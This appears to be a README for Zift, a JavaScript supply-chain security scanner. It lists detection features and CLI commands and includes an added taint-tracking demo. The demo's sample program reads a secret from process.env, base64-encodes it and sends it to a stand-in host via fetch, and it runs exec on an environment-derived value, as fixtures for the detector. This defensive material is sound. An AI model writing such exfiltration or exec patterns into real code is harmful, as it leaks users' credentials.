The Symbolically-Intelligent Ecosystem Security Engine for JavaScript.
Zift v4.2 is the "Deep Hardening" release, introducing advanced behavioral rules for Wiper detection, Worm prevention, and OS-specific targeting analysis.
- 🧠 Symbolic Taint Analysis: Tracks data through destructuring (`const { key } = process.env`) and deep property access (`obj.a.b.c`).
- 🧬 Transformation Tracking: Automatically follows taint through encoding methods like `Buffer.from(data).toString('base64')` or `'hex'`.
- 🐛 Worm & Propagation Defense: Detects the chain of credential theft, data exfiltration, and self-publishing (registry hijacking).
- 🛡️ Deep Behavioral Hardening: Flags wipers (recursive deletions), CI/CD secret theft, and unauthorized module/git tampering.
- 📡 OS Fingerprinting Detection: Identifies system targeting behaviors (`os.platform`, `arch`) coupled with network activity.
- 📦 Lifecycle-Specific Intelligence: Detects remote fetches and binary drops occurring during sensitive contexts like `preinstall`.
```bash
# 1. Install Zift
npm install -g @7nsane/zift

# 2. Set up secure wrappers (adds the --zift flag to npm/bun/pnpm)
zift setup

# 3. Audit a local project
zift .

# 4. Run your application with Active Shield
zift protect index.js
```

Zift uses a deterministic AST analysis engine. Unlike regex-based scanners, Zift understands the structure of your code: it tracks the flow of data from sensitive sources (such as `process.env`) to dangerous sinks (such as `fetch` or `child_process.exec`).
- Collection: Single-pass O(n) traversal.
- Evaluation: Priority-based rule matching.
- Intelligence: Cross-file propagation and VM-based reveal.
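As an added illustration of the source-to-sink tracking described above (example code written for this page, not Zift's implementation), the following minimal taint tracker walks an ESTree-shaped AST and applies three of the propagation rules the feature list names: destructuring of a source, dotted property access on a tainted binding, and method calls such as `Buffer.from(key).toString('base64')` that keep the taint of their receiver. The `SOURCES` and `SINKS` lists are assumptions, the AST is hand-built with small helper constructors to stand in for a real parser's output, and the sample program is constructed for the demo.

```javascript
// Added example, not Zift's code: a minimal source-to-sink taint tracker over an
// ESTree-shaped AST. SOURCES, SINKS and the sample program are assumptions.
const SOURCES = ['process.env'];                 // sensitive origins, as dotted paths
const SINKS = ['fetch', 'child_process.exec'];   // dangerous callees, as dotted paths

// Small node builders so the hand-built AST stays readable (stand-in for a parser).
const id = (name) => ({ type: 'Identifier', name });
const lit = (value) => ({ type: 'Literal', value });
const mem = (object, prop) => ({ type: 'MemberExpression', object, property: id(prop), computed: false });
const call = (callee, args = []) => ({ type: 'CallExpression', callee, arguments: args });
const plus = (left, right) => ({ type: 'BinaryExpression', operator: '+', left, right });
const decl = (target, init) => ({ type: 'VariableDeclaration', declarations: [{ id: target, init }] });
const objPat = (...keys) => ({ type: 'ObjectPattern', properties: keys.map((k) => ({ key: id(k), value: id(k) })) });
const stmt = (expression) => ({ type: 'ExpressionStatement', expression });

// Render an Identifier or non-computed member chain as a dotted path: obj.a.b.c
function dotted(node) {
  if (node.type === 'Identifier') return node.name;
  if (node.type === 'MemberExpression' && !node.computed) {
    const base = dotted(node.object);
    return base === null ? null : `${base}.${node.property.name}`;
  }
  return null;
}

// Resolve a dotted path by its longest tainted prefix: process.env.KEY is a source read,
// cfg.a.b is deep access on a tainted binding, and both resolve to their origin.
function lookup(path, env) {
  const parts = path.split('.');
  for (let i = parts.length; i > 0; i--) {
    const prefix = parts.slice(0, i).join('.');
    if (SOURCES.includes(prefix)) return path;   // reading directly from a source
    if (env.has(prefix)) return env.get(prefix);  // reading a tainted binding
  }
  return null;
}

// Origin (a source path) reaching this expression, or null if it is clean.
function taintOf(expr, env) {
  switch (expr.type) {
    case 'Literal': return null;
    case 'Identifier':
    case 'MemberExpression': {
      const path = dotted(expr);
      return path !== null ? lookup(path, env) : taintOf(expr.object, env); // a[b] carries a's taint
    }
    case 'BinaryExpression': return taintOf(expr.left, env) || taintOf(expr.right, env);
    case 'CallExpression': {
      // Transformation tracking: taint flows through the arguments and, for method calls,
      // through the receiver, so Buffer.from(key).toString('base64') keeps key's taint.
      const viaArgs = expr.arguments.map((a) => taintOf(a, env)).find(Boolean) || null;
      const viaReceiver = expr.callee.type === 'MemberExpression' ? taintOf(expr.callee.object, env) : null;
      return viaArgs || viaReceiver;
    }
  }
  return null;
}

// Single pass over top-level statements; returns [{ sink, source }] for each tainted sink call.
function analyze(program) {
  const env = new Map();   // binding name -> source path it carries
  const findings = [];
  for (const s of program) {
    if (s.type === 'VariableDeclaration') {
      for (const { id: target, init } of s.declarations) {
        if (target.type === 'ObjectPattern') {
          // const { key } = process.env  =>  key carries process.env.key
          const base = dotted(init);
          for (const p of target.properties) {
            const origin = base !== null ? lookup(`${base}.${p.key.name}`, env) : taintOf(init, env);
            if (origin) env.set(p.value.name, origin);
          }
        } else {
          const origin = taintOf(init, env);
          if (origin) env.set(target.name, origin);
        }
      }
    } else if (s.type === 'ExpressionStatement' && s.expression.type === 'CallExpression') {
      const callee = dotted(s.expression.callee);
      const origin = SINKS.includes(callee) ? taintOf(s.expression, env) : null;
      if (origin) findings.push({ sink: callee, source: origin });
    }
  }
  return findings;
}

// Constructed sample (hand-built AST), equivalent to:
//   const { key } = process.env;  const enc = Buffer.from(key).toString('base64');
//   const label = 'build';        const settings = JSON.parse(process.env.CONFIG);
//   fetch('https://example.invalid/?d=' + enc);   // tainted: key -> enc
//   child_process.exec('echo ' + label);           // clean
//   child_process.exec(settings.hooks.post);       // tainted: deep access on settings
const SAMPLE = [
  decl(objPat('key'), mem(id('process'), 'env')),
  decl(id('enc'), call(mem(call(mem(id('Buffer'), 'from'), [id('key')]), 'toString'), [lit('base64')])),
  decl(id('label'), lit('build')),
  decl(id('settings'), call(mem(id('JSON'), 'parse'), [mem(mem(id('process'), 'env'), 'CONFIG')])),
  stmt(call(id('fetch'), [plus(lit('https://example.invalid/?d='), id('enc'))])),
  stmt(call(mem(id('child_process'), 'exec'), [plus(lit('echo '), id('label'))])),
  stmt(call(mem(id('child_process'), 'exec'), [mem(mem(id('settings'), 'hooks'), 'post')])),
];

console.log(analyze(SAMPLE));
```

Running it reports two findings, `fetch` fed from `process.env.key` and `child_process.exec` fed from `process.env.CONFIG`, while the `exec('echo ' + label)` call stays clean. In a real integration the hand-built `SAMPLE` would be replaced by the `Program.body` of an ESTree parser such as acorn, and the environment would need scoping, function summaries and cross-file propagation, which this demo deliberately leaves out.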
| Command | Description |
|---|---|
| `zift .` | Deep scan of the current directory |
| `zift install <pkg>` | Pre-audit and install a package securely |
| `zift protect <app>` | Launch application with Zift Shield runtime auditing |
| `zift setup` | Configure shell aliases for secure package management |
Build with confidence. Secure with Zift. 🛡️